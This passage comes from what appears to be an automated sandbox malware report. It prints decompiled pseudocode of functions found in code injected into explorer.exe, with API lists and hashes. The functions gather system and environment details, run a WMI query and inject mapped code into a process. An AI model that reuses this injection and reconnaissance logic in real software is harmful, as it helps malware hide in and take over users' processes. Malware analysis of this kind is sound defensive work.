                            • Opcode Fuzzy Hash: 5ef8d3bc2a1d0954a875872caaf3ef1d034ba8ea9ac2313de69fc76a64cb86ef
                            • Instruction Fuzzy Hash: C0F0A031300702DBC720BF62E80496BBBE9FF563507048829E5C687962DB71F8019790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 89%
                            			E0008B337(void* __ecx) {
                            				intOrPtr _t4;
                            				void* _t5;
                            				intOrPtr _t6;
                            				void* _t12;
                            				void* _t13;
                            
                            				_t4 =  *0x9e684; // 0x286f8f0
                            				_t13 = 0;
                            				_t5 =  *((intOrPtr*)(_t4 + 0xbc))(2, 0, __ecx);
                            				_t12 = _t5;
                            				if(_t12 != 0) {
                            					_t6 =  *0x9e684; // 0x286f8f0
                            					_push(_t12);
                            					if( *((intOrPtr*)(_t6 + 0xc0))() != 0) {
                            						_t13 = 1;
                            					}
                            					CloseHandle(_t12);
                            					return _t13;
                            				}
                            				return _t5;
                            			}

                            APIs
                            • CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandle
                            • String ID:
                            • API String ID: 2962429428-0
                            • Opcode ID: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
                            • Instruction ID: 8fe01f62ba4c39ee7338d5a8f0e8a0c9642a3c10550f89b54f48b15bd4262c2d
                            • Opcode Fuzzy Hash: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
                            • Instruction Fuzzy Hash: 15E04F33300120ABD6609B69EC4CF677BA9FBA6A91F060169F905C7111CB248C02C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            C-Code - Quality: 86%
                            			E0008D01F(void* __fp0) {
                            				char _v8;
                            				char _v12;
                            				char _v16;
                            				struct _SYSTEM_INFO _v52;
                            				char _v180;
                            				char _v692;
                            				char _v704;
                            				char _v2680;
                            				void* __esi;
                            				struct _OSVERSIONINFOA* _t81;
                            				intOrPtr _t83;
                            				void* _t84;
                            				long _t86;
                            				intOrPtr* _t88;
                            				intOrPtr _t90;
                            				intOrPtr _t95;
                            				intOrPtr _t97;
                            				void* _t98;
                            				intOrPtr _t103;
                            				char* _t105;
                            				void* _t108;
                            				char _t115;
                            				signed int _t117;
                            				char _t119;
                            				intOrPtr _t124;
                            				intOrPtr _t127;
                            				intOrPtr _t130;
                            				intOrPtr _t134;
                            				intOrPtr _t147;
                            				intOrPtr _t149;
                            				intOrPtr _t152;
                            				intOrPtr _t154;
                            				signed int _t159;
                            				struct HINSTANCE__* _t162;
                            				short* _t164;
                            				intOrPtr _t167;
                            				WCHAR* _t168;
                            				char* _t169;
                            				intOrPtr _t181;
                            				intOrPtr _t200;
                            				void* _t215;
                            				char _t218;
                            				void* _t219;
                            				char* _t220;
                            				struct _OSVERSIONINFOA* _t222;
                            				void* _t223;
                            				int* _t224;
                            				void* _t241;
                            
                            				_t241 = __fp0;
                            				_t162 =  *0x9e69c; // 0x10000000
                            				_t81 = E00088604(0x1ac4);
                            				_t222 = _t81;
                            				if(_t222 == 0) {
                            					return _t81;
                            				}
                            				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
                            				_t83 =  *0x9e684; // 0x286f8f0
                            				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
                            				_t3 = _t222 + 0x648; // 0x648
                            				E00092301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
                            				_t5 = _t222 + 0x1644; // 0x1644
                            				_t216 = _t5;
                            				_t86 = GetModuleFileNameW(0, _t5, 0x105);
                            				_t227 = _t86;
                            				if(_t86 != 0) {
                            					 *((intOrPtr*)(_t222 + 0x1854)) = E00088FBE(_t216, _t227);
                            				}
                            				GetCurrentProcess();
                            				_t88 = E0008BA05();
                            				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
                            				_t178 =  *_t88;
                            				if(E0008BB8D( *_t88) == 0) {
                            					_t90 = E0008BA62(_t178, _t222);
                            					__eflags = _t90;
                            					_t181 = (0 | _t90 > 0x00000000) + 1;
                            					__eflags = _t181;
                            					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
                            				} else {
                            					 *((intOrPtr*)(_t222 + 0x214)) = 3;
                            				}
                            				_t12 = _t222 + 0x220; // 0x220
                            				 *((intOrPtr*)(_t222 + 0x218)) = E0008E3F1(_t12);
                            				 *((intOrPtr*)(_t222 + 0x21c)) = E0008E3B6(_t12);
                            				_push( &_v16);
                            				 *(_t222 + 0x224) = _t162;
                            				_push( &_v8);
                            				_v12 = 0x80;
                            				_push( &_v692);
                            				_v8 = 0x100;
                            				_push( &_v12);
                            				_t22 = _t222 + 0x114; // 0x114
                            				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
                            				_t95 =  *0x9e68c; // 0x286fab8
                            				_push(0);
                            				if( *((intOrPtr*)(_t95 + 0x6c))() == 0) {
                            					GetLastError();
                            				}
                            				_t97 =  *0x9e694; // 0x286fa48
                            				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
                            				_t26 = _t222 + 0x228; // 0x228
                            				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
                            				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
                            				GetLastError();
                            				_t31 = _t222 + 0x228; // 0x228
                            				 *((intOrPtr*)(_t222 + 0x434)) = E00088FBE(_t31, _t98);
                            				_t34 = _t222 + 0x114; // 0x114
                            				_t103 = E0008B7A8(_t34,  &_v692);
                            				_t35 = _t222 + 0xb0; // 0xb0
                            				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
                            				_push(_t35);
                            				E0008B67D(_t103, _t35, _t98, _t241);
                            				_t37 = _t222 + 0xb0; // 0xb0
                            				_t105 = _t37;
                            				_t38 = _t222 + 0xd0; // 0xd0
                            				_t164 = _t38;
                            				if(_t105 != 0) {
                            					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
                            					if(_t159 > 0) {
                            						_t164[_t159] = 0;
                            					}
                            				}
                            				_t41 = _t222 + 0x438; // 0x438
                            				_t42 = _t222 + 0x228; // 0x228
                            				E00088FD8(_t42, _t41);
                            				_t43 = _t222 + 0xb0; // 0xb0
                            				_t108 = E0008D400(_t43, E0008C379(_t43), 0);
                            				_t44 = _t222 + 0x100c; // 0x100c
                            				E0008B88A(_t108, _t44, _t241);
                            				_t199 = GetCurrentProcess();
                            				 *((intOrPtr*)(_t222 + 0x101c)) = E0008BBDF(_t110);
                            				memset(_t222, 0, 0x9c);
                            				_t224 = _t223 + 0xc;
                            				_t222->dwOSVersionInfoSize = 0x9c;
                            				GetVersionExA(_t222);
                            				_t167 =  *0x9e684; // 0x286f8f0
                            				_t115 = 0;
                            				_v8 = 0;
                            				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
                            					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
                            					_t115 = _v8;
                            				}
                            				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
                            				if(_t115 == 0) {
                            					GetSystemInfo( &_v52);
                            					_t117 = _v52.dwOemId & 0x0000ffff;
                            				} else {
                            					_t117 = 9;
                            				}
                            				_t54 = _t222 + 0x1020; // 0x1020
                            				_t168 = _t54;
                            				 *(_t222 + 0x9c) = _t117;
                            				GetWindowsDirectoryW(_t168, 0x104);
                            				_t119 = E000895E1(_t199, 0x10c);
                            				_t200 =  *0x9e684; // 0x286f8f0
                            				_t218 = _t119;
                            				 *_t224 = 0x104;
                            				_push( &_v704);
                            				_push(_t218);
                            				_v8 = _t218;
                            				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
                            					_t154 =  *0x9e684; // 0x286f8f0
                            					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
                            				}
                            				E000885D5( &_v8);
                            				_t124 =  *0x9e684; // 0x286f8f0
                            				_t61 = _t222 + 0x1434; // 0x1434
                            				_t219 = _t61;
                            				 *_t224 = 0x209;
                            				_push(_t219);
                            				_push(L"USERPROFILE");
                            				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
                            					E00089640(_t219, 0x105, L"%s\\%s", _t168);
                            					_t152 =  *0x9e684; // 0x286f8f0
                            					_t224 =  &(_t224[5]);
                            					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
                            				}
                            				_push(0x20a);
                            				_t64 = _t222 + 0x122a; // 0x122a
                            				_t169 = L"TEMP";
                            				_t127 =  *0x9e684; // 0x286f8f0
                            				_push(_t169);
                            				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
                            					_t149 =  *0x9e684; // 0x286f8f0
                            					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
                            				}
                            				_push(0x40);
                            				_t220 = L"SystemDrive";
                            				_push( &_v180);
                            				_t130 =  *0x9e684; // 0x286f8f0
                            				_push(_t220);
                            				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
                            					_t147 =  *0x9e684; // 0x286f8f0
                            					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
                            				}
                            				_v8 = 0x7f;
                            				_t72 = _t222 + 0x199c; // 0x199c
                            				_t134 =  *0x9e684; // 0x286f8f0
                            				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
                            				_t75 = _t222 + 0x100c; // 0x100c
                            				E00092301(E0008D400(_t75, E0008C379(_t75), 0),  &_v2680);
                            				_t76 = _t222 + 0x1858; // 0x1858
                            				E000922D3( &_v2680, _t76, 0x20);
                            				_t79 = _t222 + 0x1878; // 0x1878
                            				E0008902D(1, _t79, 0x14, 0x1e,  &_v2680);
                            				 *((intOrPtr*)(_t222 + 0x1898)) = E0008CD33(_t79);
                            				return _t222;
                            			}

                            APIs
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • GetCurrentProcessId.KERNEL32 ref: 0008D046
                            • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 0008D082
                            • GetCurrentProcess.KERNEL32 ref: 0008D09F
                            • GetLastError.KERNEL32 ref: 0008D13E
                            • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 0008D16C
                            • GetLastError.KERNEL32 ref: 0008D172
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 0008D1C7
                            • GetCurrentProcess.KERNEL32 ref: 0008D20E
                            • memset.MSVCRT ref: 0008D229
                            • GetVersionExA.KERNEL32(00000000), ref: 0008D234
                            • GetCurrentProcess.KERNEL32(00000100), ref: 0008D24E
                            • GetSystemInfo.KERNEL32(?), ref: 0008D26A
                            • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0008D287
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharDirectoryHeapInfoMultiSystemVersionWideWindowsmemset
                            • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                            • API String ID: 3876402152-2706916422
                            • Opcode ID: 12dfeda50fcfa05c5d9c49e5a909d2d4da4cbeaac424930ed5d12b2800c1f241
                            • Instruction ID: 25e8395d91437c6831676a43eef48ae52fba165dceb8ee9639bfc079f816c02c
                            • Opcode Fuzzy Hash: 12dfeda50fcfa05c5d9c49e5a909d2d4da4cbeaac424930ed5d12b2800c1f241
                            • Instruction Fuzzy Hash: 77B16071600704AFE750EB70DD89FEA77E8BF58300F00456AF59AD7292EB74AA04CB21
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 50%
                            			E0008DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
                            				signed int _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				char _v24;
                            				void* _v28;
                            				signed int _v32;
                            				char _v36;
                            				intOrPtr _v40;
                            				signed int _v44;
                            				char _v48;
                            				char _v52;
                            				intOrPtr _v56;
                            				signed int _v60;
                            				char* _v72;
                            				signed short _v80;
                            				signed int _v84;
                            				char _v88;
                            				char _v92;
                            				char _v96;
                            				intOrPtr _v100;
                            				char _v104;
                            				char _v616;
                            				intOrPtr* _t159;
                            				char _t165;
                            				signed int _t166;
                            				signed int _t173;
                            				signed int _t178;
                            				signed int _t186;
                            				intOrPtr* _t187;
                            				signed int _t188;
                            				signed int _t192;
                            				intOrPtr* _t193;
                            				intOrPtr _t200;
                            				intOrPtr* _t205;
                            				signed int _t207;
                            				signed int _t209;
                            				intOrPtr* _t210;
                            				intOrPtr _t212;
                            				intOrPtr* _t213;
                            				signed int _t214;
                            				char _t217;
                            				signed int _t218;
                            				signed int _t219;
                            				signed int _t230;
                            				signed int _t235;
                            				signed int _t242;
                            				signed int _t243;
                            				signed int _t244;
                            				signed int _t245;
                            				intOrPtr* _t247;
                            				intOrPtr* _t251;
                            				signed int _t252;
                            				intOrPtr* _t253;
                            				void* _t255;
                            				intOrPtr* _t261;
                            				signed int _t262;
                            				signed int _t283;
                            				signed int _t289;
                            				char* _t298;
                            				void* _t320;
                            				signed int _t322;
                            				intOrPtr* _t323;
                            				intOrPtr _t324;
                            				signed int _t327;
                            				intOrPtr* _t328;
                            				intOrPtr* _t329;
                            
                            				_v32 = _v32 & 0x00000000;
                            				_v60 = _v60 & 0x00000000;
                            				_v56 = __edx;
                            				_v100 = __ecx;
                            				_t159 = E0008D523(__ecx);
                            				_t251 = _t159;
                            				_v104 = _t251;
                            				if(_t251 == 0) {
                            					return _t159;
                            				}
                            				_t320 = E00088604(0x10);
                            				_v36 = _t320;
                            				_pop(_t255);
                            				if(_t320 == 0) {
                            					L53:
                            					E0008861A( &_v60, 0xfffffffe);
                            					E0008D5D7( &_v104);
                            					return _t320;
                            				}
                            				_t165 = E000895E1(_t255, 0x536);
                            				 *_t328 = 0x609;
                            				_v52 = _t165;
                            				_t166 = E000895E1(_t255);
                            				_push(0);
                            				_push(_v56);
                            				_v20 = _t166;
                            				_push(_t166);
                            				_push(_a4);
                            				_t322 = E000892E5(_t165);
                            				_v60 = _t322;
                            				E000885D5( &_v52);
                            				E000885D5( &_v20);
                            				_t329 = _t328 + 0x20;
                            				if(_t322 != 0) {
                            					_t323 = __imp__#2;
                            					_v40 =  *_t323(_t322);
                            					_t173 = E000895E1(_t255, 0x9e4);
                            					_v20 = _t173;
                            					_v52 =  *_t323(_t173);
                            					E000885D5( &_v20);
                            					_t324 = _v40;
                            					_t261 =  *_t251;
                            					_t252 = 0;
                            					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
                            					__eflags = _t178;
                            					if(_t178 != 0) {
                            						L52:
                            						__imp__#6(_t324);
                            						__imp__#6(_v52);
                            						goto L53;
                            					}
                            					_t262 = _v32;
                            					_v28 = 0;
                            					_v20 = 0;
                            					__eflags = _t262;
                            					if(_t262 == 0) {
                            						L49:
                            						 *((intOrPtr*)( *_t262 + 8))(_t262);
                            						__eflags = _t252;
                            						if(_t252 == 0) {
                            							E0008861A( &_v36, 0);
                            							_t320 = _v36;
                            						} else {
                            							 *(_t320 + 8) = _t252;
                            							 *_t320 = E000891E3(_v100);
                            							 *((intOrPtr*)(_t320 + 4)) = E000891E3(_v56);
                            						}
                            						goto L52;
                            					} else {
                            						goto L6;
                            					}
                            					while(1) {
                            						L6:
                            						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
                            						__eflags = _t186;
                            						if(_t186 != 0) {
                            							break;
                            						}
                            						_v16 = 0;
                            						_v48 = 0;
                            						_v12 = 0;
                            						_v24 = 0;
                            						__eflags = _v84;
                            						if(_v84 == 0) {
                            							break;
                            						}
                            						_t187 = _v28;
                            						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
                            						__eflags = _t188;
                            						if(_t188 >= 0) {
                            							__imp__#20(_v24, 1,  &_v16);
                            							__imp__#19(_v24, 1,  &_v48);
                            							_t46 = _t320 + 0xc; // 0xc
                            							_t253 = _t46;
                            							_t327 = _t252 << 3;
                            							_t47 = _t327 + 8; // 0x8
                            							_t192 = E00088698(_t327, _t47);
                            							__eflags = _t192;
                            							if(_t192 == 0) {
                            								__imp__#16(_v24);
                            								_t193 = _v28;
                            								 *((intOrPtr*)( *_t193 + 8))(_t193);
                            								L46:
                            								_t252 = _v20;
                            								break;
                            							}
                            							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
                            							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E00088604( *(_t327 +  *_t253) << 3);
                            							_t200 =  *_t253;
                            							__eflags =  *(_t327 + _t200 + 4);
                            							if( *(_t327 + _t200 + 4) == 0) {
                            								_t136 = _t320 + 0xc; // 0xc
                            								E0008861A(_t136, 0);
                            								E0008861A( &_v36, 0);
                            								__imp__#16(_v24);
                            								_t205 = _v28;
                            								 *((intOrPtr*)( *_t205 + 8))(_t205);
                            								_t320 = _v36;
                            								goto L46;
                            							}
                            							_t207 = _v16;
                            							while(1) {
                            								_v12 = _t207;
                            								__eflags = _t207 - _v48;
                            								if(_t207 > _v48) {
                            									break;
                            								}
                            								_v44 = _v44 & 0x00000000;
                            								_t209 =  &_v12;
                            								__imp__#25(_v24, _t209,  &_v44);
                            								__eflags = _t209;
                            								if(_t209 < 0) {
                            									break;
                            								}
                            								_t212 = E000891E3(_v44);
                            								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
                            								_t213 = _v28;
                            								_t281 =  *_t213;
                            								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
                            								__eflags = _t214;
                            								if(_t214 < 0) {
                            									L39:
                            									__imp__#6(_v44);
                            									_t207 = _v12 + 1;
                            									__eflags = _t207;
                            									continue;
                            								}
                            								_v92 = E000895E1(_t281, 0x250);
                            								 *_t329 = 0x4cc;
                            								_t217 = E000895E1(_t281);
                            								_t283 = _v80;
                            								_v96 = _t217;
                            								_t218 = _t283 & 0x0000ffff;
                            								__eflags = _t218 - 0xb;
                            								if(__eflags > 0) {
                            									_t219 = _t218 - 0x10;
                            									__eflags = _t219;
                            									if(_t219 == 0) {
                            										L35:
                            										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
                            										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                            										__eflags = _t289;
                            										if(_t289 == 0) {
                            											L38:
                            											E000885D5( &_v92);
                            											E000885D5( &_v96);
                            											__imp__#9( &_v80);
                            											goto L39;
                            										}
                            										_push(_v72);
                            										_push(L"%d");
                            										L37:
                            										_push(0xc);
                            										_push(_t289);
                            										E00089640();
                            										_t329 = _t329 + 0x10;
                            										goto L38;
                            									}
                            									_t230 = _t219 - 1;
                            									__eflags = _t230;
                            									if(_t230 == 0) {
                            										L33:
                            										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
                            										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                            										__eflags = _t289;
                            										if(_t289 == 0) {
                            											goto L38;
                            										}
                            										_push(_v72);
                            										_push(L"%u");
                            										goto L37;
                            									}
                            									_t235 = _t230 - 1;
                            									__eflags = _t235;
                            									if(_t235 == 0) {
                            										goto L33;
                            									}
                            									__eflags = _t235 == 1;
                            									if(_t235 == 1) {
                            										goto L33;
                            									}
                            									L28:
                            									__eflags = _t283 & 0x00002000;
                            									if((_t283 & 0x00002000) == 0) {
                            										_v88 = E000895E1(_t283, 0x219);
                            										E00089640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
                            										E000885D5( &_v88);
                            										_t329 = _t329 + 0x18;
                            										_t298 =  &_v616;
                            										L31:
                            										_t242 = E000891E3(_t298);
                            										L32:
                            										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
                            										goto L38;
                            									}
                            									_t242 = E0008DA20( &_v80);
                            									goto L32;
                            								}
                            								if(__eflags == 0) {
                            									__eflags = _v72 - 0xffff;
                            									_t298 = L"TRUE";
                            									if(_v72 != 0xffff) {
                            										_t298 = L"FALSE";
                            									}
                            									goto L31;
                            								}
                            								_t243 = _t218 - 1;
                            								__eflags = _t243;
                            								if(_t243 == 0) {
                            									goto L38;
                            								}
                            								_t244 = _t243 - 1;
                            								__eflags = _t244;
                            								if(_t244 == 0) {
                            									goto L35;
                            								}
                            								_t245 = _t244 - 1;
                            								__eflags = _t245;
                            								if(_t245 == 0) {
                            									goto L35;
                            								}
                            								__eflags = _t245 != 5;
                            								if(_t245 != 5) {
                            									goto L28;
                            								}
                            								_t298 = _v72;
                            								goto L31;
                            							}
                            							__imp__#16(_v24);
                            							_t210 = _v28;
                            							 *((intOrPtr*)( *_t210 + 8))(_t210);
                            							_t252 = _v20;
                            							L42:
                            							_t262 = _v32;
                            							_t252 = _t252 + 1;
                            							_v20 = _t252;
                            							__eflags = _t262;
                            							if(_t262 != 0) {
                            								continue;
                            							}
                            							L48:
                            							_t324 = _v40;
                            							goto L49;
                            						}
                            						_t247 = _v28;
                            						 *((intOrPtr*)( *_t247 + 8))(_t247);
                            						goto L42;
                            					}
                            					_t262 = _v32;
                            					goto L48;
                            				} else {
                            					E0008861A( &_v36, _t322);
                            					_t320 = _v36;
                            					goto L53;
                            				}
                            			}


                            APIs
                              • Part of subcall function 0008D523: CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
                              • Part of subcall function 0008D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
                              • Part of subcall function 0008D523: CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
                              • Part of subcall function 0008D523: SysAllocString.OLEAUT32(00000000), ref: 0008D569
                              • Part of subcall function 0008D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            • SysAllocString.OLEAUT32(00000000), ref: 0008DBE5
                            • SysAllocString.OLEAUT32(00000000), ref: 0008DBF9
                            • SysFreeString.OLEAUT32(?), ref: 0008DF82
                            • SysFreeString.OLEAUT32(?), ref: 0008DF8B
                              • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                            • String ID: FALSE$TRUE
                            • API String ID: 1290676130-1412513891
                            • Opcode ID: cef9d765e2338686624ad15c9d49e4584251ea0903c5bed5b6d50983f8e298f7
                            • Instruction ID: 1b20700aac11c4dae470c7e010e7ba276413c48b0cffd0f81d1503e5e528a265
                            • Opcode Fuzzy Hash: cef9d765e2338686624ad15c9d49e4584251ea0903c5bed5b6d50983f8e298f7
                            • Instruction Fuzzy Hash: 58E15E71E00219AFDF54FFA4C985EEEBBB9FF48310F14815AE545AB292DB31A901CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 59%
                            			E0008C6C0(intOrPtr __ecx, intOrPtr __edx) {
                            				signed int _v8;
                            				char _v12;
                            				char _v16;
                            				intOrPtr _v20;
                            				char _v24;
                            				char _v28;
                            				char _v32;
                            				intOrPtr _v36;
                            				struct HINSTANCE__* _v40;
                            				char _v44;
                            				char _v56;
                            				char _v72;
                            				struct _WNDCLASSEXA _v120;
                            				intOrPtr _t69;
                            				intOrPtr _t71;
                            				intOrPtr _t75;
                            				intOrPtr _t80;
                            				intOrPtr _t92;
                            				intOrPtr _t95;
                            				intOrPtr _t96;
                            				struct HWND__* _t106;
                            				intOrPtr* _t113;
                            				struct HINSTANCE__* _t116;
                            				intOrPtr _t120;
                            				intOrPtr _t126;
                            				intOrPtr _t131;
                            				intOrPtr _t134;
                            				intOrPtr _t136;
                            				intOrPtr _t139;
                            				char _t140;
                            				intOrPtr _t141;
                            
                            				_t69 =  *0x9e688; // 0xb0000
                            				_t126 = __ecx;
                            				_t134 = __edx;
                            				_t116 = 0;
                            				_v36 = __edx;
                            				_v16 = 0;
                            				_v44 = 0;
                            				_v40 = 0;
                            				_v12 = 0;
                            				_v8 = 0;
                            				_v24 = 0;
                            				_v20 = __ecx;
                            				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
                            					E0008E23E(0x1f4);
                            					_t116 = 0;
                            				}
                            				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
                            				_v28 = _t116;
                            				if( *_t113 != 0x4550) {
                            					L12:
                            					if(_v8 != 0) {
                            						_t75 =  *0x9e780; // 0x0
                            						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
                            						_v8 = _v8 & 0x00000000;
                            					}
                            					L14:
                            					if(_v12 != 0) {
                            						_t136 =  *0x9e780; // 0x0
                            						 *((intOrPtr*)(_t136 + 0x10))(GetCurrentProcess(), _v12);
                            					}
                            					if(_v16 != 0) {
                            						_t71 =  *0x9e780; // 0x0
                            						 *((intOrPtr*)(_t71 + 0x20))(_v16);
                            					}
                            					return _v8;
                            				}
                            				_push(_t116);
                            				_push(0x8000000);
                            				_v44 =  *((intOrPtr*)(_t113 + 0x50));
                            				_push(0x40);
                            				_push( &_v44);
                            				_push(_t116);
                            				_push(0xe);
                            				_push( &_v16);
                            				_t80 =  *0x9e780; // 0x0
                            				if( *((intOrPtr*)(_t80 + 0xc))() < 0) {
                            					goto L12;
                            				}
                            				_v120.style = 0xb;
                            				_v120.cbSize = 0x30;
                            				_v120.lpszClassName =  &_v56;
                            				asm("movsd");
                            				_v120.lpfnWndProc = DefWindowProcA;
                            				asm("movsd");
                            				asm("movsd");
                            				asm("movsb");
                            				asm("movsd");
                            				asm("movsd");
                            				asm("movsw");
                            				asm("movsb");
                            				_v120.cbWndExtra = 0;
                            				_v120.lpszMenuName = 0;
                            				_v120.cbClsExtra = 0;
                            				_v120.hInstance = 0;
                            				if(RegisterClassExA( &_v120) != 0) {
                            					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
                            					if(_t106 != 0) {
                            						DestroyWindow(_t106);
                            						UnregisterClassA( &_v56, 0);
                            					}
                            				}
                            				_t139 =  *0x9e780; // 0x0
                            				_push(0x40);
                            				_push(0);
                            				_push(2);
                            				_push( &_v24);
                            				_push(0);
                            				_push(0);
                            				_push(0);
                            				_push( &_v12);
                            				_push(GetCurrentProcess());
                            				_push(_v16);
                            				if( *((intOrPtr*)(_t139 + 0x14))() < 0) {
                            					_t126 = _v20;
                            					goto L12;
                            				} else {
                            					_push(0x40);
                            					_push(0);
                            					_push(2);
                            					_push( &_v24);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_t126 = _v20;
                            					_push( &_v8);
                            					_t92 =  *0x9e780; // 0x0
                            					_push(_t126);
                            					_push(_v16);
                            					if( *((intOrPtr*)(_t92 + 0x14))() < 0) {
                            						goto L12;
                            					}
                            					_t140 = E00088669( *0x9e688, 0x1ac4);
                            					_v32 = _t140;
                            					if(_t140 == 0) {
                            						goto L12;
                            					}
                            					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
                            					_t95 =  *0x9e684; // 0x286f8f0
                            					_t96 =  *((intOrPtr*)(_t95 + 0x54))(_t126, 0, 0x1ac4, 0x1000, 4);
                            					_t120 =  *0x9e684; // 0x286f8f0
                            					_t131 = _t96;
                            					 *((intOrPtr*)(_t120 + 0x20))(_v20, _t131, _t140, 0x1ac4,  &_v28);
                            					E0008861A( &_v32, 0x1ac4);
                            					_t141 =  *0x9e688; // 0xb0000
                            					 *0x9e688 = _t131;
                            					E000886E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
                            					E0008C63F(_v12, _v8, _v36);
                            					 *0x9e688 = _t141;
                            					goto L14;
                            				}
                            			}

                            APIs
                            • RegisterClassExA.USER32 ref: 0008C785
                            • CreateWindowExA.USER32 ref: 0008C7B0
                            • DestroyWindow.USER32 ref: 0008C7BB
                            • UnregisterClassA.USER32(?,00000000), ref: 0008C7C6
                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0008C7E2
                            • GetCurrentProcess.KERNEL32(00000000), ref: 0008C8DB
                              • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                            Strings
                            Memory Dump Source
